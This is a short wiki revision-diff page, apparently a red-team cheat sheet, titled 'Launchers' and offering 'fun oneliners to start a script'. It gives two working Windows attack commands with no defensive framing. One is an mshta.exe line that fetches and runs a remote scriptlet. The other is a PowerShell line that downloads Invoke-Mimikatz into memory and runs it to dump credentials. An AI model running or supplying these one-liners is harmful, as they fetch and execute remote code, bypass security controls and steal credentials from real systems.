Launchers: Difference between revisions

From WikiWiki
Jump to navigation Jump to search
No edit summary   (change visibility)
No edit summary   (change visibility)
Line 1: Line 1:
Some fun oneliners to start a script
=Some fun oneliners to start a script=
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
</syntaxhighlight>
</syntaxhighlight>
src: https://twitter.com/ch33kyf3ll0w/status/816319597645328384
src: https://twitter.com/ch33kyf3ll0w/status/816319597645328384
<syntaxhighlight lang="powershell">
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz
</syntaxhighlight>

Revision as of 09:45, 5 January 2017

Some fun oneliners to start a script

mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)

src: https://twitter.com/ch33kyf3ll0w/status/816319597645328384

invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz